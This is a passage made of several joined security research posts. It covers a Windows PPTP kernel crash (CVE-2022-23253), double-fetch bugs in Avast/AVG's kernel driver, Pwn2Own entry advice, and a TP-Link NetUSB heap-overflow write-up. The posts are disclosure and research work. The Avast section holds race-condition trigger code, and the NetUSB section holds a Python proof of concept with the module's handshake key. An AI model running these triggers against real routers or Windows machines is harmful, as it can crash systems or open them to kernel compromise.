The test case appears to initially be very simple and actually mostly resembles what we would expect for a valid PPTP connection. The difference is the second IncomingCallConnected message. For some reason, upon receiving an IncomingCallConnected control message for a call ID that is already connected, a null pointer dereference is triggered causing a system crash to occur.

Let’s look at the crash and see if we can see why this relatively simple error causes such a large issue.

The Crash

Looking at the stack trace for the crash we get the following:

... <- (Windows Bug check handling)
NDIS!NdisMCmActivateVc+0x2d
raspptp!CallEventCallInConnect+0x71
raspptp!CtlpEngine+0xe63
raspptp!CtlReceiveCallback+0x4b
... <- (TCP/IP Handling)

What’s interesting here is that we can see that the crash does not not take place in the raspptp.sys driver at all, but instead occurs in the ndis.sys driver. What is ndis.sys? Well, raspptp.sys in what is referred to as a mini-port driver, which means that it only actually implements a small part of the functionality required to implement an entire VPN interface and the rest of the VPN handling is actually performed by the NDIS driver system. raspptp.sys acts as a front end parser for PPTP which then forwards on the encapsulated virtual network frames to NDIS to be routed and handled by the rest of the Windows VPN back-end.

So why is this null pointer dereference happening? Let’s look at the code to see if we can glean any more detail.

The Code

The first section of code is in the PPTP control connection state machine. The first part of this handling is a small stub in a switch statement for handling the different control messages. For an IncomingCallConnected message, we can see that all the code initially does is check that a valid call ID and context structure exists on the server. If they do exist, a call is made to the CallEventCallInConnect function with the message payload and the call context structure.

case IncomingCallConnected:
    // Ensure the client has sent a valid StartControlConnectionRequest message
    if ( lpPptpCtlCx->CtlCurrentState == CtlStateWaitStop )
    {
        // BigEndian To LittleEndian Conversion
        CallIdSentInReply = (unsigned __int16)__ROR2__(lpCtlPayloadBuffer->IncomingCallConnected.PeersCallId, 8);
        if ( PptpClientSide ) // If we are the client
            CallIdSentInReply &= 0x3FFFu; // Maximum ID mask
            // Get the context structure for this call ID if it exists
            IncomingCallCallCtx = CallGetCall(lpPptpCtlCx->pPptpAdapterCtx, CallIdSentInReply);
            // Handle the incoming call connected event
            if ( IncomingCallCallCtx )
                CallEventCallInConnect(IncomingCallCallCtx, lpCtlPayloadBuffer);

The CallEventCallInConnect function performs two tasks; it activates the virtual call connection through a call to NdisMCmActivateVc and then if the returned status from that function is not STATUS_PENDING it calls the PptpCmActivateVcComplete function.

__int64 __fastcall CallEventCallInConnect(CtlCall *IncomingCallCallCtx, CtlMsgStructs *IncomingCallMsg)
{
    unsigned int ActiveateVcRetCode;
    ...
ActiveateVcRetCode = NdisMCmActivateVc(lpCallCtx->NdisVcHandle, (PCO_CALL_PARAMETERS)lpCallCtx->CallParams);
if ( ActiveateVcRetCode != STATUS_PENDING )
{
    if...
        PptpCmActivateVcComplete(ActiveateVcRetCode, lpCallCtx, (PVOID)lpCallCtx->CallParams);
    }
return 0i64;
}

...

NDIS_STATUS __stdcall NdisMCmActivateVc(NDIS_HANDLE NdisVcHandle, PCO_CALL_PARAMETERS CallParameters)
{
    __int64 v2; // rbx
    PCO_CALL_PARAMETERS lpCallParameters; // rdi
    KIRQL OldIRQL; // al
    _CO_MEDIA_PARAMETERS *lpMediaParameters; // rcx
    __int64 v6; // rcx

    v2 = *((_QWORD *)NdisVcHandle + 9);
    lpCallParameters = CallParameters;
    OldIRQL = KeAcquireSpinLockRaiseToDpc((PKSPIN_LOCK)(v2 + 8));
    *(_DWORD *)(v2 + 4) |= 1u;
    lpMediaParameters = lpCallParameters->MediaParameters;
    if ( lpMediaParameters->MediaSpecific.Length < 8 )
        v6 = (unsigned int)v2;
    else
        v6 = *(_QWORD *)lpMediaParameters->MediaSpecific.Parameters;
        *(_QWORD *)(v2 + 136) = v6;
        *(_QWORD *)(v2 + 136) = *(_QWORD *)lpCallParameters->MediaParameters->MediaSpecific.Parameters;
        KeReleaseSpinLock((PKSPIN_LOCK)(v2 + 8), OldIRQL);
    return 0;
}

We can see that in reality, the NdisMCMActivateVc function is surprisingly simple. We know that it always returns 0 so there will always be a proceeding call to PptpCmActivateVcComplete by the CallEventCallInConnect function.

Looking at the stack trace we know that the crash is occurring at an offset of 0x2d into the NdisMCmActivateVc function which corresponds to the following line in our pseudo code:

lpMediaParameters = lpCallParameters->MediaParameters;

Since NdisMCmActivateVc doesn’t sit in our main target driver, raspptp.sys, it’s mostly un-reverse engineered, but it’s pretty clear to see that the main purpose is to set some properties on a structure which is tracked as the handle to NDIS from raspptp.sys. Since this doesn’t really seem like it’s directly causing the issue we can safely ignore it for now. The particular variable lpCallParameters (also the CallParameters argument) is causing the null pointer dereference and is passed into the function by raspptp.sys; this indicates that the vulnerability must be occurring somewhere else in the raspptp.sys driver code.

Referring back to the call from CallEventCallInConnect we know that the CallParmaters argument is actually a pointer stored within the Call Context structure in raspptp.sys. We can assume that at some point in the call to PptpCmActivateVcComplete this structure is freed and the pointer member of the structure is set to zero. So lets find the responsible line!

void __fastcall PptpCmActivateVcComplete(unsigned int OutGoingCallReplyStatusCode, CtlCall *CallContext, PVOID CallParams)
{
    CtlCall *lpCallContext; // rdi
    ...
if ( lpCallContext->UnkownFlag )
{
    if ( lpCallParams )
        ExFreePoolWithTag((PVOID)lpCallContext->CallParams, 0);
        lpCallContext->CallParams = 0i64;
        ...

After a little bit of looking we can see the responsible sections of code. From reverse engineering the setup of the CallContext structure we know that the UnkownFlag structure variable is set to 1 by the handling of the IncomingCallRequest frame where the CallContext structure is initially allocated and setup. For our test case this code will always execute and thus the second call to CallEventCallInConnect will trigger a null pointer dereference and crash the machine in the NDIS layer, causing the appropriate Blue Screen Of Death to appear:

Proof Of Concept

We will release proof of concept code on May 2nd to allow extra time for systems administrators to patch.

Timeline

  • Vulnerability reported To Microsoft – 29 Oct 2021
  • Vulnerability acknowledged – 29 Oct 2021
  • Vulnerability confirmed – 11 Nov 2021
  • Patch release date confirmed – 18 Jan 2022
  • Patch released – 08 March 2022
  • Blog released – 22 March 2022

The post CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference appeared first on Nettitude Labs.

Vulnerabilities in Avast And AVG Put Millions At Risk

Executive Summary

  • SentinelLabs has discovered two high severity flaws in Avast and AVG (acquired by Avast in 2016) that went undiscovered for years affecting dozens of millions of users.
  • These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to Avast during December 2021 and the vulnerabilities are tracked as CVE-2022-26522 and CVE-2022-26523.
  • Avast has silently released security updates to address these vulnerabilities.
  • At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.

Introduction

Avast’s “Anti Rootkit” driver (also used by AVG) has been found to be vulnerable to two high severity attacks that could potentially lead to privilege escalation by running code in the kernel from a non-administrator user. Avast and AVG are widely deployed products, and these flaws have potentially left many users worldwide vulnerable to cyber attacks.

Given that these products run as privileged services on Windows devices, such bugs in the very software that is intended to protect users from harm present both an opportunity to attackers and a grave threat to users.

Security products such as these run at the highest level of privileges and are consequently highly attractive to attackers, who often use such vulnerabilities to carry out sophisticated attacks. Vulnerabilities such as this and others discovered by SentinelLabs (1, 2, 3) present a risk to organizations and users deploying the affected software.

As we reported recently, threat actors will exploit such flaws given the opportunity, and it is vital that affected users take appropriate mitigation actions. According to Avast, the vulnerable feature was introduced in Avast 12.1. Given the longevity of this flaw, we estimate that millions of users were likely exposed.

Security products ensure device security and are supposed to prevent such attacks from happening, but what if the security product itself introduces a vulnerability? Who’s protecting the protectors?

CVE-2022-26522

The vulnerable routine resides in a socket connection handler in the kernel driver aswArPot.sys. Since the two reported vulnerabilities are very similar, we will primarily focus on the details of CVE-2022-26522.

CVE-2022-26522 refers to a vulnerability that resides in aswArPot+0xc4a3.

As can be seen in the image above, the function first attaches the current thread to the target process, and then uses nt!PsGetProcessPeb to obtain a pointer to the current process PEB (red arrow). It then fetches (first time) PPEB->ProcessParameters->CommandLine.Length to allocate a new buffer (yellow arrow). It then copies the user supplied buffer at PPEB->ProcessParameters->CommandLine.Buffer with the size of PPEB->ProcessParameters->CommandLine.Length (orange arrow), which is the first fetch.

During this window of opportunity, an attacker could race the kernel thread and modify the Length variable.

Looper thread:

  PTEB tebPtr = reinterpret_cast(__readgsqword(reinterpret_cast(&static_cast<NT_TIB*>(nullptr)->Self)));
    PPEB pebPtr = tebPtr->ProcessEnvironmentBlock;
 
    pebPtr->ProcessParameters->CommandLine.Length = 2;
   
    while (1) {
        pebPtr->ProcessParameters->CommandLine.Length ^= 20000;
    }

As can be seen from the code snippet above, the code obtains a pointer to the PEB structure and then flips the Length field in the process command line structure.

The vulnerability can be triggered inside the driver by initiating a socket connection as shown by the following code.

   printf("\nInitialising Winsock...");
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        printf("Failed. Error Code : %d", WSAGetLastError());
        return 1;
    }
 
    printf("Initialised.\n");
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
        printf("Could not create socket : %d", WSAGetLastError());
    }
    printf("Socket created.\n");
 
 
    server.sin_addr.s_addr = inet_addr(IP_ADDRESS);
    server.sin_family = AF_INET;
    server.sin_port = htons(80);
 
    if (connect(s, (struct sockaddr*)&server, sizeof(server)) < 0) {
        puts("connect error");
        return 1;
    }
 
    puts("Connected");
 
    message = (char *)"GET / HTTP/1.1\r\n\r\n";
    if (send(s, message, strlen(message), 0) < 0) {
        puts("Send failed");
        return 1;
    }
    puts("Data Sent!\n");

So the whole flow looks like this:

Once the vulnerability is triggered, the user sees the following alert from the OS.

CVE-2022-26523

The second vulnerable function is at aswArPot+0xbb94 and is very similar to the first vulnerability. This function double fetches the Length field from a user controlled pointer, too.

This vulnerable code is a part of several handlers in the driver and, therefore, can be triggered multiple ways such as via image load callback.

Both of these vulnerabilities were fixed in version 22.1.

Impact

Due to the nature of these vulnerabilities, they can be triggered from sandboxes and might be exploitable in contexts other than just local privilege escalation. For example, the vulnerabilities could be exploited as part of a second stage browser attack or to perform a sandbox escape, among other possibilities.

As we have noted with similar flaws in other products recently (1, 2, 3), such vulnerabilities have the potential to allow complete take over of a device, even without privileges, due to the ability to execute code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products.

Mitigation

The majority of Avast and AVG users will receive the patch (version 22.1) automatically; however, those using air gapped or on premise installations are advised to apply the patch as soon as possible.

Conclusion

These high severity vulnerabilities, affect millions of users worldwide. As with another vulnerability SentinelLabs disclosed that remained hidden for 12 years, the impact this could have on users and enterprises that fail to patch is far reaching and significant.

While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, with dozens of millions of users affected, it is possible that attackers will seek out those that do not take the appropriate action. Our reason for publishing this research is to not only help our customers but also the community to understand the risk and to take action.

As part of the commitment of SentinelLabs to advancing industry security, we actively invest in vulnerability research, including advanced threat modeling and vulnerability testing of various platforms and technologies.

We would like to thank Avast for their approach to our disclosure and for quickly remediating the vulnerabilities.

Disclosure Timeline

  • 20 December, 2021 – Initial disclosure.
  • 04 January, 2022 – Avast acknowledges the report.
  • 11 February, 2022 – Avast notifies us that the vulnerabilities are fixed.

What to Expect when Exploiting: A Guide to Pwn2Own Participation

So you’ve heard of Pwn2Own and think you are up to the challenge of competing in the world’s most prestigious hacking competition. Great! We would love to have you! However, there are a few things you should know before we get started. With Pwn2Own Vancouver just around the corner, here are 10 things you need to know before participating in Pwn2Own.

1.     You need to register before the contest.

We try to make this as apparent as possible in the rules, but we still have people walk into the room on the first day of the contest hoping to participate. There are a lot of logistics around Pwn2Own, so we need everyone to complete their registration before the contest starts. We can’t support anyone who wants to join on the first day of the competition.

2.     You need to answer the vetting email.

Again, the logistics of running the Pwn2Own competition can be daunting. One way we prepare is by vetting all entries before registration closes. We need to understand the nature of your exploit to ensure it fits within the rules and to ensure we have everything we need on hand to run the attempt. For example, we need to know how you plan on demonstrating if the exploit is successful. If you answer, “Our exploit will provide a root shell when it has succeeded” – we know you have a solid plan and that it is within the rules. If you tell us you need to start as an admin user and require four reboots, your entry is unlikely to qualify. We’ll also ask for things like other user interactions or the need for a Man-in-the-Middle (MitM). These could disqualify the entry – or it could be fine. It depends on the target and details, which is why we want to know before the competition. It’s not fair to any of the contestants to have them think their exploit is a winner just to be disqualified during the contest.

3.     What should we call you?

We know people enter Pwn2Own to win cash and prizes, but they want recognition, too. We’re more than happy to include your Twitter handle, your company name, or just about anything else. Just let us know. We try to pre-stage a lot of our communications, so an omission or misspelling could take a bit to get fixed, and we want to give contestants the attention they deserve. You’d be surprised how many people wait until during or after the event to clarify how they wish to be mentioned.

4.     Will you be participating locally or remotely?

This is a newer question but opening up the contest to remote participation has allowed many to participate that otherwise would not. However, remote contestants have a few extra hurdles the on-site participants do not. For remote participants, all artifacts must be submitted to the ZDI prior to registration closing. This includes things like the white paper, the exploit, and any further details needed for the entry. Contestants competing in person have until the contest begins to have these deliverables ready.

5.     Are you aware a white paper is required for each entry?

This is one aspect that many don’t realize. Each entry in Pwn2Own needs an accompanying white paper describing the vulnerabilities used during the attempt. These white papers are critical in the judging of the competition, especially if exploits from different contestants seem similar. For example, if two groups both use a use-after-free bug against a target, is it the same bug? Maybe. Maybe not. A clearly written white paper will help us understand your research and identify whether it is unique or a bug collision. It also helps the vendor pinpoint the exact place to look at when they start working on the fix.

6.     Ask questions before the competition.

There can be a lot of nuances in exploiting targets at Pwn2Own. How will we judge certain scenarios? How will the targets be configured? Does this type of exploit qualify for this bonus? Is the target in this configuration or that configuration? Is this software completely in the default configuration, or is this commonly applied setting used? There are a lot of very reasonable questions to ask before the contest, and we try to answer every one of them the best we can. If you are thinking about participating but have a specific configuration or rule-related questions, please e-mail us. Questions asked over Twitter or other means may not be answered in a timely manner. It might seem archaic to some, but e-mail makes it easier to track inquiries and ensure they get responses.

7.     Be prepared for things to go wrong.

Five minutes seems like plenty of time – until you’re on stage at Pwn2Own and there’s a clock counting down. If your first attempt fails, do you have a plan? What are you going to check? Can you adjust your exploit in a meaningful way within the allotted time? Certain types of exploits work better at Pwn2Own than others. For example, timing attacks and race conditions might not be the best choice to use at Pwn2Own. Yes, your exploit may work 100% of the time before you arrive at the contest, but what if it doesn’t when you’re on stage? Make a plan B, and probably a plan C and D as well.

8.     Are you participating as an individual, a part of a team, or representing a company?

While we do want maximum participation in each contest, we also need to place some restrictions on how that participation occurs. For example, if you are representing a company, you can’t also participate as an individual. If you are a part of a small team, you can’t also represent a company. This restriction helps keep the contest fair to everyone involved and prevents bug sharing meant to skew the overall results.

9.     When you arrive at the contest, take a minute to confirm the target versions.

Before the contest begins – even before we do the drawing for order – we allow contestants to verify configurations and software versions of the targets. We always use the latest and greatest versions of available software as Pwn2Own targets, and vendors are known to release patches right before the competition in a last-ditch attempt to thwart contestants. It’s a good idea to take a minute and double-check the versions in the contest are the same versions you were testing back home. We will communicate the versions before the contest, so you will know what to target.

10.  Rub a rabbit’s foot, grab a four-leafed clover, or do whatever else brings you luck.

Thanks to the drawing for order at the beginning of each contest, there is a degree of randomness to the competition. You could end up with a great spot in the schedule, or you could end up late in the contest when the chances for bug collisions are higher. But you can’t rely on luck, either. Some teams will just move on to a new target as soon as they find a bug to try to get as many entries in as possible and hope for a good draw - even if their bugs are low-hanging fruit. However, the teams that really want to compete for Master of Pwn spend a lot of time going deep and finding bugs other teams may miss. Pwn2Own is certainly a competition of skill but having a little luck (at least good luck) never hurts either.

Of course, there’s a lot more to participating in Pwn2Own than just these 10 things, but these will definitely help you prepare for the competition and, hopefully, increase your chances of winning. We really do root for all of the contestants, and we want to do all we can to increase your chances of success. Still, we need to adjudicate the contest fairly for all competitors. If you are on the fence about participating in Pwn2Own, I hope this guidance helps you find the right path to joining us. We celebrate the 15th anniversary of the contest this year in Vancouver, and we’d love to see you there.

What to Expect when Exploiting: A Guide to Pwn2Own Participation

[Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)

An introduction to Use-After-Free exploitation and walking through one of my old challenges. Challenge Info: https://www.malwaretech.com/challenges/windows-exploitation/user-after-free-1-0 Download Link: https://malwaretech.com/downloads/challenges/UserAfterFree2.0.rar Password: MalwareTech

The post [Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1) appeared first on MalwareTech.

Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate to the contest and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, the hardware was easy and cheap to get so it felt like the right choice.

router targets

At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out what are the interesting attack surfaces to look at.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two line of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low hanging fruits and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended to order a FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

Enumerating the attack surfaces

It was time for me to figure out which areas I should try to focus my time on. I did a bunch of reading as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new grounds to lower the chance of entering the competition with a duplicate and also maximize my chances at finding something that would allow me to enter the competition. Before thinking about duplicates, I need a bug.

I started to do some very basic attack surface enumeration: processes running, iptable rules, sockets listening, crontable, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq

At first sight, the following processes looked interesting: - the uhttpd HTTP server, - the third-party dnsmasq service that potentially could be unpatched to upstream bugs (unlikely?), - the tdpServer which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.

One another thing I burned time on is to go through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out if dnsmasq was properly patched to recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed different 😔. Dead-end.

NetUSB shenanigans

There were two strange lines in the netstat output from above that did stand out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -

Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where the attacker inputs is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
  if(result) {
    v64[0] = _bswapw(v64[0]); <----------------------- attacker controlled
    Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0); <---- overflow
    if(Payload_1) {
      // ...
      if(SoftwareBus_fillBuf(SbusConnection, Payload_1 + 2, v64[0]))

I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefuly, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
  if(SbusConnection)
    if(Buffer) {
      if(BufferLen) {
        while (1) {
          GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
          if ( GetLen <= 0 )
            break;
          BufferLen -= GetLen;
          Buffer = (char *)Buffer + GetLen;
          if ( !BufferLen )
            return 1;
        }
        kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
        return 0;
      }
      else {
        return 1;
      }
    } else {
      // ...
      return 0;
    }
  }
  else {
    // ...
    return 0;
  }
}

KTCP_get is basically a wrapper around ks_recv, which basically means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data I wanted. If you are interested to learn on how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py or you can also read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
  # Version
  s.send(b'\x56\x04')
  # Send random data
  s.send(aes_ctx.encrypt(b'a' * 16))
  _ = s.recv(16)
  # Receive & send back the random numbers.
  challenge = s.recv(16)
  s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
  length = len(name)
  assert length - 1 < 63
  s.send(le32(length))
  b = name
  if type(name) == str:
    b = bytes(name, 'ascii')
  s.send(b)

def create_connection(target, port, name):
  second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target, port))
  aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
  send_handshake(s, aes_ctx)
  send_bus_name(s, name)
  return s, aes_ctx

def main():
  parser = argparse.ArgumentParser('Zenith PoC2')
  parser.add_argument('--target', required = True)
  args = parser.parse_args()
  s, _ = create_connection(args.target, netusb_port, 'PoC2')
  s.send(le8(0xff))
  s.send(le8(0x21))
  s.send(le32(0xff_ff_ff_ff))
  p = b'\xab' * (0x1_000 * 100)
  s.send(p)

Another interesting detail was that the allocation function is mallocPageBuf which I didn't know about. After looking into its implementation, it eventually calls into _get_free_pages which is part of the Linux kernel. _get_free_pages allocates 2**n number of pages, and is implemented using what is called, a Binary Buddy Allocator. I wasn't familiar with that kind of allocator, and ended-up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content and I was able to overflow the pages with pretty much as much data as I wanted. The only thing that I couldn't fully control was the size passed to the allocation. The only limitation was that I could only trigger a mallocPageBuf call with a size in the following interval: [0, 8] because of the integer overflow. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke _get_free_pages.

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
  // ...
  v1 = vsprintf(v6, a1);
  v2 = v1 < 257;
  v3 = v1 + 1;
  if(!v2) {
    v6[256] = 0;
    v3 = 257;
  }
  v5 = v3;
  kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
  return printk("<1>%s", v6);
}

Pretty funny right?

Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob so this lack of introspections wasn't going to work. What are my options?

Well, as I mentioned earlier TP-Link is maintaining a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement with my current situation. I would be able to hook-up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering but it was in fact not it. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both of the kernel configurations until I end up with a bootable image that has a configuration as close as possible from the kernel running on the device. Same kernel version, allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any types used by this structure can do the same which means that looking at the main definition of a structure is not enough.

struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
  /* List of functions to handle Wireless Extensions (instead of ioctl).
   * See <net/iw_handler.h> for details. Jean II */
